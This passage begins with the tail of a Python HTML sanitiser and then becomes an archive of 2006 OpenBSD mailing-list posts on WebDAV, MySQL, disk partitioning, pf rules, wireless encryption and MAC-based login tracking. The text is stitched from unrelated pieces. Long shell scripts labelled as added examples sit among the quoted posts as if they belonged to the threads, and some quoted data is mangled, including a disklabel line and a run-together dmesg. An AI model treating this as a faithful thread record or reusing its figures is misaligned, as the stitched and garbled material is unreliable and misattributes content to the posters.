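    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag not in self.open_tags:
            return
        while self.open_tags:                     # also closes anything left open inside
            top = self.open_tags.pop()
            self.out.append("</%s>" % top)
            if top == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(html.escape(data, quote=False))

    # Comments (including IE conditional comments) are dropped by the
    # HTMLParser default handle_comment, which does nothing.

    def result(self):
        while self.open_tags:                     # balance tags the input never closed
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitise(fragment):
    """Return a cleaned HTML fragment that is safe to store and re-serve."""
    p = Sanitiser()
    p.feed(fragment)
    p.close()
    return p.result()
```

Run the sanitiser on the way in (before the value is stored) and treat its output as the only version that is ever rendered.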
Re: WebDAV
On 3 Dec 2006, at 21:12, Pete Vickers wrote:

> I've used it problem free with osx windows clients; it should probably only be available only over https,

Amusingly, that's almost the exact same setup I ended up with :) I also had a non-ssl site serving from the same web root and denied access to that. My subfolder was /md/ and I had:

<VirtualHost hostname.com:80>
    ...
    <Location /md>
        Deny from all
    </Location>
</VirtualHost>

<VirtualHost hostname.com:443>
    ...
    SSLEngine On
    ...
    <Location /md>
        DAV On
        ...
    </Location>
</VirtualHost>

This way the site is visible over normal http with the DAV protected section hidden, and the DAV area is only accessible over https.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
WebDAV
Hi,

Although the mail archives have little on the topic, as does google, are there any major security concerns I should be aware of when installing mod_dav under the stock OpenBSD apache1.3, with apache chrooted?

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
MySQL, pulling my hair out
I'm really having an incredibly painful time with MySQL on 3.9. Has anybody had a problem getting MySQL 4 or 5 to play happy? I've read these pages:

http://www.openbsdsupport.org/mysql.htm
http://monkey.org/openbsd/archive/misc/0411/msg03296.html
http://marc.theaimsgroup.com/?l=openbsd-misc&m=111881975209858&w=2
http://marc.theaimsgroup.com/?l=openbsd-misc&m=111887588311627&w=2

And applied it to MySQL 5, both from ports, and the latest 4.x release built from source. I still get the database basically locking under moderate load, or failing to do a mysqlcheck. The errors I get (from the .err file) are along these lines:

061119 18:03:31 [ERROR] /usr/local/libexec/mysqld: Can't find file: './condor5/user.frm' (errno: 9)
061119 18:03:31 [ERROR] /usr/local/libexec/mysqld: Can't find file: './condor5/user_in_group.frm' (errno: 9)
061119 18:03:31 [ERROR] /usr/local/libexec/mysqld: Can't find file: './condor5/user_in_group.frm' (errno: 9)

(using 4.x) Or these when doing the suggested mysqlcheck command:

mysql.columns_priv   OK
mysql.db             OK
mysql.func           error: File './mysql/func.MYD' not found (Errcode: 9)
mysql.help_category  error: File './mysql/help_category.MYD' not found (Errcode: 9)
mysql.help_keyword   error: File './mysql/help_keyword.MYD' not found (Errcode: 9)
mysql.help_relation  error: File './mysql/help_relation.MYD' not found (Errcode: 9)
mysql.help_topic     error: File './mysql/help_topic.MYD' not found (Errcode: 9)

I've followed all the instructions on the relevant pages, and instructions from the mail archives, but to no avail. I have a theory that it doesn't hold up under the load of dspam using MySQL as its back end, and I'll be trying that running under something else, but for the moment normal everyday databases just stop working after a while.

What have you had to do to get MySQL up and running properly?

# sysctl kern.maxfiles
kern.maxfiles=13666
# cat /etc/login.conf
...
# # MySQL daemon # _mysql:\ :datasize=infinity:\ :maxproc=infinity:\ :openfiles-cur=2048:\ :openfiles-max=8192:\ :stacksize-cur=8M:\ :localcipher=blowfish,8:\ :tc=default: # userinfo _mysql login _mysql passwd * uid 502 groups _mysql change NEVER class _mysql gecos MySQL Account dir /nonexistent shell /sbin/nologin expire NEVER # cat /etc/my.cnf | grep files open_files_limit = 2048 # dmesg OpenBSD 3.9 (GENERIC.MP) #598: Thu Mar 2 02:37:06 MST 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP cpu0: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID real mem = 2146541568 (2096232K) avail mem = 1952505856 (1906744K) using 4278 buffers containing 107429888 bytes (104912K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(00) BIOS, date 10/30/05, BIOS32 rev. 0 @ 0xf0010 apm0 at bios0: Power Management spec V1.2 apm0: AC on, battery charge unknown apm0: flags 30102 dobusy 0 doidle 1 pcibios at bios0 function 0x1a not configured bios0: ROM list: 0xc/0x8000 0xc8000/0x2200 mainbus0: Intel MP Specification (Version 1.1) (INTELPremium ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 133 MHz cpu1 at mainbus0: apid 1 (application processor) cpu1: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID mainbus0: bus 0 is type PCI mainbus0: bus 1 is type PCI mainbus0: bus 2 is type PCI mainbus0: bus 3 is type PCI mainbus0: bus 4 is type PCI mainbus0: bus 5 is type ISA ioapic0 at mainbus0: apid 2 pa 0xfec0, version 20, 24 pins pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 Intel 82955X MCH rev 0x81 ppb0 at pci0 dev 28 function 0 Intel 82801GB PCIE rev 0x01 pci1 at ppb0 bus 4 ppb1 at pci0 
dev 28 function 4 Intel 82801G PCIE rev 0x01 pci2 at ppb1 bus 3 em0 at pci2 dev 0 function 0 Intel PRO/1000MT (82573L) rev 0x00: apic 2 int 16 (irq 11), address 00:15:f2:c8:8e:10 ppb2 at pci0 dev 28 function 5 Intel 82801G PCIE rev 0x01 pci3 at ppb2 bus 2 CMD Technology SiI3132 SATA rev 0x01 at pci3 dev 0 function 0 not configured uhci0 at pci0 dev 29 function 0 Intel 82801GB USB rev 0x01: apic 2 int 20 (irq 10) usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered uhci1 at pci0 dev 29 function 1 Intel 82801GB USB rev 0x01: apic 2 int 17 (irq 10) usb1 at uhci1: USB revision 1.0 uhub1 at usb1 uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub1: 2 ports with 2 removable, self powered uhci2 at pci0 dev 29 function 2 Intel
Re: How to mail attachments from the command line?
On 30 Aug 2006, at 19:51, Torsten Geile wrote:

> mail -a file -s test recipient . would do it, but actually in my case it doesn't.

I think you have to send it in base64 encoded form, with a few added headers. What's simpler would be to put it in some publicly accessible place (like a website) and send the URL to the file rather than the file itself.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: How to mail attachments from the command line?
On 30 Aug 2006, at 20:08, Gaby Vanhegan wrote:

> I think you have to send it in base64 encoded form, with a few added headers. What's simpler would be to put it in some publicly accessible place (like a website) and send the URL to the file rather than the file itself.

Sorry, wrong list... :)

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: OT hardware IDE RAID cards
On 16 Aug 2006, at 06:24, Theo de Raadt wrote:

> If you are stuck on SATA, the Areca stuff is a few weeks away from totally rocking. And it is cheap.

I can see that these guys also freely provide API documentation and code: http://www.areca.com.tw/support/index/dc1120.htm

Does this mean that it will be supported by bioctl soon?

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: OT hardware IDE RAID cards
On 16 Aug 2006, at 15:58, Bernd Schoeller wrote:

>>> If you are stuck on SATA, the Areca stuff is a few weeks away from totally rocking. And it is cheap.
>>
>> Does this mean that it will be supported by bioctl soon?
>
> Is there any other way to understand Theo's comment? ;-)

Huzzah for open documentation!

-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: OT hardware IDE RAID cards
On 16 Aug 2006, at 15:58, Bernd Schoeller wrote:

>>> If you are stuck on SATA, the Areca stuff is a few weeks away from totally rocking. And it is cheap.
>>
>> I can see that these guys also freely provide API documentation and code: http://www.areca.com.tw/support/index/dc1120.htm
>>
>> Does this mean that it will be supported by bioctl soon?
>
> Is there any other way to understand Theo's comment? ;-)

They have them at Scan in the UK:
http://www.scan.co.uk/search/search.asp?criteria=areca&Submit=Go

They look quite a bit more expensive than equivalent LSI cards:
http://www.scan.co.uk/search/search.asp?criteria=lsi&Submit=Go

Although they don't stock a PCI-e version.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Expand /var
So, I have this disk setup:

# df -h
Filesystem     Size    Used   Avail Capacity  Mounted on
/dev/sd0a     49.2G    1.6G   45.2G     3%    /
/dev/sd0g      181G    2.0K    172G     0%    /backup
/dev/sd0f      167G    549M    158G     0%    /home
/dev/sd0e      9.8G   12.0K    9.3G     0%    /tmp
/dev/sd0d     49.2G    5.9G   40.8G    13%    /var

# disklabel sd0
...
16 partitions:
#        size     offset    fstype  [fsize bsize  cpg]
  a: 10485753763            4.2BSD    2048 16384  323 # Cyl      0*-  51199
  b:    8388608  104857600    swap                    # Cyl  51200 -  55295
  c:  980451328          0  unused       0     0      # Cyl      0 - 478735
  d:  104857600  113246208  4.2BSD    2048 16384  323 # Cyl  55296 - 106495
  e:   20971520  218103808  4.2BSD    2048 16384  323 # Cyl 106496 - 116735
  f:  356515840  239075328  4.2BSD    2048 16384  323 # Cyl 116736 - 290815
  g:  384855782  595591168  4.2BSD    2048 16384  323 # Cyl 290816 - 478733*

So far, I have nothing on /backup, nothing particularly interesting on /home and /tmp is unused. I want to make /var a bit bigger, but I don't want to rebuild the entire machine from scratch, so could I:

1. Back up all data in /var, /home and /
2. Using disklabel, remove /backup, /home, /tmp, expand /var a bit, recreate /backup, /home and /tmp again
3. Use growfs to push /var up to its new size
4. Restore the data into /home

Is it really that easy to expand a partition? Have I missed something here? Is it a safer/simpler bet to wipe the disk and start again?

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
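The one check the plan above depends on is whether the partition after /var is physically contiguous with it: growfs can only extend a filesystem into sectors that directly follow it, so deleting a neighbour only helps if the neighbour starts exactly where /var ends. The script below is an added example, not code from the post: it reads saved disklabel(8) output, checks adjacency from the size and offset columns, and works out the size /var would reach. The label embedded in it is constructed from the d/e/f/g lines quoted above.

```shell
#!/bin/sh
# Added example: check from disklabel(8) output whether two partitions are
# contiguous (offset + size of the first == offset of the second), which is
# the precondition for growing the first one with growfs(8) after the second
# is deleted. Sizes and offsets are 512-byte sectors.
set -e

# Constructed sample: the d/e/f/g lines of the "disklabel sd0" in the post.
SAMPLE_LABEL='
  d:  104857600  113246208  4.2BSD  2048 16384  323 # Cyl  55296 - 106495
  e:   20971520  218103808  4.2BSD  2048 16384  323 # Cyl 106496 - 116735
  f:  356515840  239075328  4.2BSD  2048 16384  323 # Cyl 116736 - 290815
  g:  384855782  595591168  4.2BSD  2048 16384  323 # Cyl 290816 - 478733*
'

# part_field LABEL PART FIELD: print column FIELD (2 = size, 3 = offset)
# of partition PART, e.g. part_field "$SAMPLE_LABEL" d 3 -> 113246208
part_field() {
    printf '%s\n' "$1" | awk -v p="$2:" -v f="$3" '$1 == p { print $f; exit }'
}

# part_end LABEL PART: first sector after PART (offset + size)
part_end() {
    echo $(( $(part_field "$1" "$2" 3) + $(part_field "$1" "$2" 2) ))
}

# adjacent LABEL P Q: "yes" when Q starts exactly where P ends, so that
# deleting Q leaves space growfs can extend P into; otherwise "no"
adjacent() {
    if [ "$(part_end "$1" "$2")" -eq "$(part_field "$1" "$3" 3)" ]; then
        echo yes
    else
        echo no
    fi
}

# grown_size LABEL P Q: sectors P would have after absorbing adjacent Q;
# prints nothing when they are not adjacent
grown_size() {
    if [ "$(adjacent "$1" "$2" "$3")" = yes ]; then
        echo $(( $(part_field "$1" "$2" 2) + $(part_field "$1" "$3" 2) ))
    fi
}

# sectors_to_gib SECTORS: whole GiB (2097152 sectors of 512 bytes per GiB)
sectors_to_gib() { echo $(( $1 / 2097152 )); }

# Report for the layout in the post: /var is d, /tmp is e.
echo "d and e adjacent: $(adjacent "$SAMPLE_LABEL" d e)"
echo "d after absorbing e: $(sectors_to_gib "$(grown_size "$SAMPLE_LABEL" d e)") GiB"
```

On a live box, feed it the real label with `disklabel sd0` captured into a variable; for the layout above it reports that d and e are contiguous and that /var would go from 50 GiB to 60 GiB by taking over /tmp. The step the script does not do for you is the disklabel edit itself and the growfs run, which need the filesystem unmounted and the backups the post already lists.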
Re: time-based pf rules in crontab do not survive a reboot (naturally)?
On 15 Jul 2006, at 15:48, Soner Tari wrote:

> I have time-based pf rules using cron and anchors (such as to restrict HTTP access after hours). But as you can guess, they do not survive a reboot. Is there any solution?

Create a script that works out what the rules should be at any given time, add it to /etc/rc.local so it's run at boot.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
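What that reply describes, written out as an added example (not code from the thread): one script that both cron and /etc/rc.local call, which decides from the current hour what the anchor should contain and loads it with pfctl. That way a reboot at 03:00 comes up with the same after-hours rules cron would have installed. The anchor name "afterhours", the 08:00 to 18:00 window and the LAN interface em1 are assumptions.

```shell
#!/bin/sh
# Added example: compute time-based pf anchor rules from the clock and load
# them, so cron and rc.local share one source of truth for the anchor.
set -e

ANCHOR=afterhours
LAN_IF=${LAN_IF:-em1}   # assumed LAN-side interface
OPEN_FROM=8             # HTTP allowed from 08:00 ...
OPEN_UNTIL=18           # ... up to, but not including, 18:00

# after_hours HH: "yes" when hour HH (00-23, leading zero allowed) lies
# outside the allowed window, "no" otherwise
after_hours() {
    h=${1#0}                    # drop a leading zero so 08 and 09 are not read as octal
    h=$(( ${h:-0} + 0 ))
    if [ "$h" -ge "$OPEN_FROM" ] && [ "$h" -lt "$OPEN_UNTIL" ]; then
        echo no
    else
        echo yes
    fi
}

# rules_for_hour HH: the rule text the anchor should contain at hour HH.
# Empty output means the anchor is loaded empty and nothing is blocked.
rules_for_hour() {
    if [ "$(after_hours "$1")" = yes ]; then
        printf 'block return in on %s proto tcp from any to any port { 80 443 }\n' "$LAN_IF"
    fi
}

# apply_rules HH: replace the anchor contents with the rules for hour HH.
# Skipped where pfctl is absent so the logic can be exercised on any host.
apply_rules() {
    if command -v pfctl >/dev/null 2>&1; then
        rules_for_hour "$1" | pfctl -a "$ANCHOR" -f -
    fi
}

# crontab:  0 8,18 * * * /usr/local/sbin/afterhours.sh --apply
# rc.local: /usr/local/sbin/afterhours.sh --apply
if [ "${1:-}" = "--apply" ]; then
    apply_rules "$(date +%H)"
fi
```

The main ruleset still has to reference the anchor (an `anchor afterhours` line in pf.conf), exactly as the cron-only setup already requires; the script only changes who fills it. Because the rules are derived from the hour rather than toggled, running it at any time is safe and idempotent, which is what makes it suitable for rc.local.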
Re: Wireless card use
On 8 Jun 2006, at 09:36, Andy Hayward wrote: Edimax EW-7128G http://www.scan.co.uk/Products/ProductInfo.asp?WebProductID=152539 Can't argue with that price! Thanks! -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: Spam Complaint
On 7 Jun 2006, at 13:33, Eliza Mazur wrote: I would like to get additional information about a spam complaint that was posted by your company. Do you have a specific department that handles these sorts of inquiries, or should I send the details regarding this matter direct to this email address? I await your reply, Elizabeth Mazur I'll deal with this one. (sound of email being moved to trash) -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Wireless card use
Has anybody any good/bad experiences to report with:

http://www.ebuyer.com/UK/product/50127
Netgear WG311 Wireless PCI card

The reviews seem to rate them, it's listed as supported hardware and it's less than £30. Any reason I shouldn't get one of these to go with a 3.9 box?

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 6 Jun 2006, at 09:40, Stuart Henderson wrote: You'd be sniffing encrypted traffic at that point, right? Not if you poison ARP, since the traffic will be directed to your MAC address and the AP will send it encrypted with your key. It's just an ethernet-type network, remember. (You can do the same thing with bridged VPNs, too). Isn't there a pre-shared key used as an IV of some sort in WEP (and therefore WPA)? Yes, the traffic will be coming to you, but it's on a wireless network, so you can sniff if passively if you want, you don't need an IP address for that. Is there no way to defend against ARP poisoning? If not, then this a good argument for encrypting the data at higher layers, rather than relying on link layer security. If you've been keeping an eye on what Reyk's been doing you might have noticed his description of scalable networks (http://www.openbsd.org/papers/bsdcan06-wlan/slide_12.html) with each client in its own /30 - this is not only useful for dynamic routing, it also ensures no free IP address for the ARP tricks involved. Is there video/audio of that presentation? I would be interested to hear the whole thing. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 6 Jun 2006, at 17:12, Spruell, Darren-Perot wrote:

> My understanding is that the key shared by the WLAN nodes in WPA-PSK is used to generate session keys, which are then cycled on a frequent basis (by TKIP, if configured on WPA1) or another method that escapes me on WPA2 (802.11i). You arp spoof and you can have traffic directed to you, but it's encrypted using a symmetric session key which you don't have.

This was my understanding of the situation. The traffic comes to you in encrypted form (you get it anyway as wireless is a broadcast medium) but the rotating keys make it hard to crack the encryption before the key changes. I suppose you could steal a connection if you sniffed the initial handshake from the client. However, the initial password will be readily available. I'm not totally up to speed on WPA but does this make the connection more easily crackable?

> The biggest weakness pointed out thus far in WPA to my knowledge has been in response to weak passphrases used for PSKs and dictionary attacks against them.

No fear, a strong password would be used, along the lines of random numbers and letters, upper and lowercase.

> I would challenge that by intercepting WPA-protected traffic you can obtain cleartext so simply.

Based on what I've read, I would agree with this. I would also argue that most casual wifi crackers are lazy, and will be more likely to go for the unsecured AP down the road, rather than the guy who's using WPA/TKIP, even if it is technically crackable.

This does mean that I'll need to use FreeBSD if I want to do it all in one box.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 6 Jun 2006, at 19:37, Spruell, Darren-Perot wrote:

> I understand. You're not saying anything regarding intercepting an existing session and accessing the data; it's akin to getting an Ethernet cable on a LAN (since you have the PSK for authentication) and negotiating a new communication session (key, etc.) with the AP. So at that point, you're effectively on the LAN, so have access to the traffic that runs across it anyway.

However, if the sessions are individually keyed for each user, with a time-dependent rotating key, the person spoofing the MAC won't have the corresponding key, so won't be able to decode the traffic properly? It's similar to being on the same switch, but the radio traffic that is visible is WPA encrypted, again with the time-dependent keys. So even if the PSK is freely available, the initial session negotiation means it's still hard to steal another person's traffic? Or am I getting my layers mixed up here?

> A problem which WPA Enterprise (w/RADIUS and individual per-user authentication, not per-computer authentication) would protect against. Unfortunately, something that wouldn't suit the OP's situation either...

Yes, it requires a RADIUS client to connect. I have read a little more about RADIUS (specifically FreeRADIUS) and I like the features it has to offer, especially the accounting parts. It's a shame it's not suitable, it takes care of a lot of the problems I have yet to work out.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
AP Encryption
Hi,

What are my options for encrypting wireless traffic between client and access point, where the access point is an OpenBSD box with a supported wireless card? Does it just depend on what encryption methods the card supports?

I'm not that bothered about people getting onto the network, as I'm giving the password away to all and sundry. I'm more concerned with stopping people sniffing other wireless traffic. I guess IPSec would be a good step forward but I want to make it as simple as possible for clients to connect:

Wireless Client --- (Insert encryption here) --- OpenBSD/AP/pf --- ADSL --- Internet

WEP is pretty much out, WPA isn't supported, IPSec is probably too complicated for the general public to get going, and that's about it. If I can't do it in OpenBSD, I may have to use a separate access point, but I'd rather keep it all in one box.

Any suggestions here?

Many thanks,

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 5 Jun 2006, at 21:14, Spruell, Darren-Perot wrote:

>> From: [EMAIL PROTECTED]
>> WEP is pretty much out, WPA isn't supported, IPSec is probably too complicated for the general public to get going, and that's about it. If I can't do it in OpenBSD, I may have to use a separate access point, but I'd rather keep it all in one box.
>
> OpenVPN is a fairly good choice for this. Strong crypto options, very minimalistic configurations can be used on both the client and server side of things, support for address pools, X.509 certificate authentication or static keys, works with NAT, and clients available for popular platforms.

Although a VPN is a possibility, I'm thinking more along the lines of a wireless hotspot than an extended network. I want to make it as plain and simple as possible for punters to walk in off the street and get internet access. No client downloads, no convoluted key setup process, just walk in, put the password in and go. I kind of want an excuse for this:

http://www.flickr.com/photos/[EMAIL PROTECTED]/146733948/in/set-72057594135255982/

I may have to settle for some token protection method, such as WPA, purely for the purposes of simplicity. Alternatively use a separate AP that supports WPA2 and a bunch of other protocols, and not bother trying to do it all in OpenBSD. Terms and conditions apply, your data is never totally secure, etc, etc. Shame really, one box would be better than two.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 5 Jun 2006, at 23:05, Spruell, Darren-Perot wrote:

> Recent FreeBSD has WPA(2?) support or you could pick up a $50 WAP to provide it too. Don't know if there's anything with good security and good ease-of-client-setup outside of that...

It's always the trade-off between ease of use and security. More of one usually means less of another, and vice versa. It looks like FreeBSD sort of do WPA with wpa_supplicant, and combine that with hostap, it could do. One way or another, the system requires some wireless kit, so it's a case of spend ages hunting for a PCI card that works with OpenBSD or FreeBSD, or just spend £10 more and get an AP that does it all anyway.

On 5 Jun 2006, at 23:40, Stuart Henderson wrote:

>> Although a VPN is a possibility, I'm thinking more along the lines of a wireless hotspot than an extended network.
>
> Turn off encryption unless you want to give a false impression of security. WPA is still subject to ARP poisoning attacks from users on the network.

If somebody is determined to get in, they will. If they want to cock about with the network too, there's little I can actually do to stop that. I just want to make some sort of effort. I think the way forward is to go with the strongest encryption that just a password can give, and tell users to make use of some stronger means of security, along with some basic information. Not too much though, don't want to scare them off...

> Walk around the average town for half an hour with a z/laptop running kismet and see just how many people worked out how to set up encryption on their own networks...

Surely this works in my favour? Because there's such a plethora of easy targets, any target putting up a better than average defence (but by no means uncrackable), they'll go for the softer target. I would.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: MAC - IP - MAC
On 4 Jun 2006, at 15:55, Nick Guenther wrote:

> Being more restrictive will just end up being a pain. For example, maybe two friends want to share a connection, so the first gets on and then after a bit passes it off to the second who changes their IP and MAC to match, but then bam, they can't get on. Or maybe someone dualboots. I don't know as I've never tried it, but what happens on a network when the same MAC address appears for two devices?

The principle is one login = one person at a time. If they dualboot, once they've booted into another OS, either the dhcp server will give them the same address they had last time, or if their MAC is different they'll get a new IP, and will just have to login again to get access.

If two people want to share, they can't, unless they have two separate accounts, or are willing to indulge in internet connection sharing. Most of this stuff is beyond the casual user anyhow, which is the intended audience. There's a limit to how many layers of protection I can build in, but I think this is probably far enough.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: MAC - IP - MAC
On 3 Jun 2006, at 17:03, Clint M. Sand wrote:

> So all I have to do is *TRY* to login as you on another machine and your original legit connection is dropped? Think about this.

Only successful logins would update the IP associated with that login. Failed login attempts would do nothing. Sorry, my wording was a little unclear, what I actually meant was a successful login from a second machine would kick the first login off, as the most recent IP would be the one associated with that client. If the first client successfully logged in again, that would kick the second login off.

The best I can do against somebody trying to use a stale IP is to check the MAC address that the successful login came from against what it claims to be at the time. Any mis-match and the IP is kicked off. If people want to go to the effort of spoofing a MAC address and finding a stale IP to use, there's little I can do. Being that this is a service intended for the general public, I'm reckoning that 99.9% of users won't even know that a MAC could be spoofed, or know how to do it.

I suppose I could take it one step further and get a tcp OS fingerprint of the client at login time, and use that as a further aid to checking that the person that logged in is the person currently using this IP address. Is there any way to protect against this?

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
MAC - IP - MAC
Hello, good evening and welcome.

I'm building a system that allows wireless clients to connect to an AP, authenticate themselves with a login and password, and they're then granted access to the internet, through a pf firewall using tables to control access.

The clients are all assigned an address through DHCP (hopefully using dhcpd) so they should have an entry in dhcpd.leases for their MAC. When they authenticate, their MAC address is what is used to identify them, not their IP. I'm using a custom system to authenticate users, authpf is not really suitable here.

Authenticated MACs are converted to an IP address, using dhcpd.leases to do the lookup. Then, as a double check, it will use the ARP cache to confirm that the IP and the MAC match up, so users can't steal access from a stale IP somewhere. If a user picks a static IP, they won't have an entry in dhcpd.leases, so they won't get access.

What I'm looking for is a simple way to pull an IP/MAC combination out of a dhcpd.leases file, or a reasonably sized dhcpd.leases file that I can test a parser on. Can anybody help out here?

Also, does this system sound reasonable or sensible? All comments welcome.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
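The lookup the post asks for, as an added example rather than code from the thread: an awk parser that pulls the current lease for a MAC out of dhcpd.leases(5), honouring the fact that the file is append-only (the last block naming a MAC is its live lease) and that a lease may have expired, followed by the ARP cross-check the post describes. It also serves the follow-ups in this thread about stale IPs: the ARP comparison is exactly the "MAC it claims to be at the time" check. The lease file, the `arp -an` output and the "now" timestamp are constructed samples so it runs offline; the pf table name "authed" is an assumption.

```shell
#!/bin/sh
# Added example: MAC -> IP via dhcpd.leases, then confirm via the ARP table
# that the kernel currently sees that MAC behind that IP before admitting it.
set -e

# Constructed dhcpd.leases: blocks are appended as leases are granted or
# renewed, so the last block mentioning a MAC is its current lease. Here
# 00:11:22:33:44:55 first held 10.0.0.20 and later moved to 10.0.0.21.
SAMPLE_LEASES='
lease 10.0.0.20 {
  starts 5 2006/06/02 20:00:00;
  ends 5 2006/06/03 08:00:00;
  hardware ethernet 00:11:22:33:44:55;
  client-hostname "laptop-a";
}
lease 10.0.0.22 {
  starts 5 2006/06/02 21:00:00;
  ends 5 2006/06/03 09:00:00;
  hardware ethernet aa:bb:cc:dd:ee:ff;
}
lease 10.0.0.21 {
  starts 5 2006/06/02 22:00:00;
  ends 5 2006/06/03 10:00:00;
  hardware ethernet 00:11:22:33:44:55;
}
'

# Constructed "arp -an" output: 10.0.0.22 is answered by a MAC other than the
# one holding its lease, the stale-IP case the post wants to refuse.
SAMPLE_ARP='? (10.0.0.20) at 00:11:22:33:44:55 on em1
? (10.0.0.21) at 00:11:22:33:44:55 on em1
? (10.0.0.22) at de:ad:be:ef:00:01 on em1'

# lease_ip_for_mac LEASES MAC NOW: print the IP of the latest lease for MAC
# if it has not ended by NOW ("YYYY/MM/DD HH:MM:SS", UTC as dhcpd writes it),
# otherwise nothing. That format compares correctly as a plain string, and
# "ends never" sorts above any date, so infinite leases count as active.
lease_ip_for_mac() {
    printf '%s\n' "$1" | awk -v mac="$2" -v now="$3" '
        /^lease /               { ip = $2; hw = ""; ends = "" }
        /^ *ends /              { ends = $3 " " $4; sub(/;$/, "", ends) }
        /^ *hardware ethernet / { hw = tolower($3); sub(/;$/, "", hw) }
        /^}/                    { if (hw == tolower(mac)) { cur = ip; cur_ends = ends } }
        END                     { if (cur != "" && cur_ends > now) print cur }'
}

# arp_mac_for_ip ARPTABLE IP: the MAC the kernel currently has for IP
arp_mac_for_ip() {
    printf '%s\n' "$1" | awk -v ip="($2)" '$2 == ip { print tolower($4); exit }'
}

# authorize LEASES ARPTABLE MAC NOW: "allow IP" when MAC holds an active lease
# and the ARP table agrees on who answers that IP, else "deny REASON"
authorize() {
    ip=$(lease_ip_for_mac "$1" "$3" "$4")
    if [ -z "$ip" ]; then
        echo "deny no-active-lease"
        return 0
    fi
    seen=$(arp_mac_for_ip "$2" "$ip")
    if [ "$seen" = "$(echo "$3" | tr 'A-Z' 'a-z')" ]; then
        echo "allow $ip"
    else
        echo "deny arp-mismatch $ip"
    fi
}

# grant MAC: the live version, reading the real files and clock and adding
# an allowed IP to the pf table "authed" (assumed name) the ruleset consults
grant() {
    verdict=$(authorize "$(cat /var/db/dhcpd.leases)" "$(arp -an)" "$1" \
                        "$(date -u '+%Y/%m/%d %H:%M:%S')")
    case "$verdict" in
        allow\ *) pfctl -t authed -T add "${verdict#allow }" ;;
    esac
    echo "$verdict"
}

authorize "$SAMPLE_LEASES" "$SAMPLE_ARP" 00:11:22:33:44:55 '2006/06/02 23:00:00'
authorize "$SAMPLE_LEASES" "$SAMPLE_ARP" aa:bb:cc:dd:ee:ff '2006/06/02 23:00:00'
```

Two things worth knowing before relying on it: the ARP entry only exists once the client has actually sent traffic to the gateway, so run the check on the login request itself rather than before it; and, as the thread says, a client that spoofs another's MAC passes this check, which is why the login is still tied to the account rather than to the address.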
Re: MAC - IP - MAC
On 2 Jun 2006, at 23:16, Spruell, Darren-Perot wrote:

> Neither reasonable nor sensible from a security standpoint. Authenticating based on MAC addresses is like authenticating someone on the pretense of them wearing a blue shirt. It's not a strong authenticator and it can be changed easily.

It's more of an identifier. I'm trying to use it to only allow one client per login/password, and I just figured MAC addresses would be more unique than an IP and easier to track between different sites. The login and password is still independent of the IP address.

